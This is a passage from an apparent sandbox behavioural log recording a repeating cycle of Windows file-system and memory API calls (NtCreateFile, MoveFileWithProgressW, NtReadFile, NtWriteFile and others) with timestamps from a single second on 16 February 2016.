"NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,664", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,664", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,664", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,664", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,664", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,664", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:56,674", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,674", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,674", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,674", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,674", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,674", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,674", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,674", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:56,674", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,674", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,674", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,684", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,684", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,684", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,684", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,684", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:56,694", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,694", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,694", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,694", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,694", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,694", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,694", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,694", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:56,694", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,694", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,694", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,704", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,704", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,704", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,704", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,704", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:56,704", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,704", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,704", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,714", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,714", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,714", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,714", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,714", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:56,714", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,714", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,714", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,724", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,724", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,724", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,724", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,724", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:56,724", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,724", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,724", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,724", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,724", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,724", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,724", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,724", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:56,734", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,734", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,734", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,734", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,734", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,734", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,734", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,734", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:56,734", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,734", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,734", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,744", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,744", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,744", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,744", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,744", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:56,744", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,744", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,744", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,754", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,754", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,754", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,754", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,754", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:56,754", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,754", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,754", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,754", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,764", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,764", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,764", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,764", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:56,764", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,764", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,764", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,764", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,764", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,764", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,764", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,764", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:56,764", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,764", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,764", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,774", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,774", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,774", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,774", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,774", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:56,774", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,774", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,774", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,784", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,784", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,784", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,784", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,784", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:56,784", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,784", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,784", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,794", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,794", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,794", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,794", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,794", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:56,794", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,794", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,794", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,804", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,804", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,804", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,804", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,804", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:56,804", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,804", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,804", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,804", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,804", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,804", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,804", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,804", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:56,814", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,814", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,814", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,814", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,814", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,814", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,814", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,814", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:56,814", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,814", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,824", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,824", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,824", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,824", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,824", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,824", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:56,824", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,824", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,834", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,834", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,834", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,834", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,834", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,834", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:56,834", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,834", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,834", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,844", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,844", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,844", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,844", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,844", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:56,844", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,844", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,844", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,844", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,844", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,844", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,854", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,854", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:56,854", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,854", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,854", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,854", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,854", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,854", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,854", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,854", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:56,864", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,864", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,864", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,864", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,864", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,864", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,864", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,864", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:56,864", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,874", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,874", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,874", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,874", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,874", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,874", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,874", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:56,874", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,874", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,874", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,884", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,884", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,884", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,884", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,884", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:56,884", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,884", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,884", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,884", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,894", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,894", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,894", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,894", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:56,894", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,894", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,894", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,894", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,894", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,894", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,904", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,904", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:56,904", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,904", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,904", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,904", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,904", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,904", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,914", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,914", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:56,914", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,914", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,914", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,914", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,914", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,914", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,914", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,914", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,914", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,924", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,924", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:56,924", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,924", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,924", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,924", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,924", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,924", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,924", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,924", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:56,924", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,924", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,934", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,934", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,934", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,934", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,934", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,934", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:56,934", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,934", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,934", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,934", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,934", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,934", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,944", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,944", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:56,944", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,944", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,944", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,944", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,944", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,944", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,944", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,944", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:56,944", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,944", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,954", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,954", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,954", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,954", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,954", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,954", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:56,954", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,954", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,954", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,954", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,954", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,964", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,964", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,964", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:56,964", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,964", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,964", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,964", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,964", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,964", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,964", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,964", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:56,964", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,964", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,964", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,974", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,974", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,974", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,974", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,974", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:56,974", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,974", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,974", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,974", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,974", "api": "NtSetInformationFile"}, 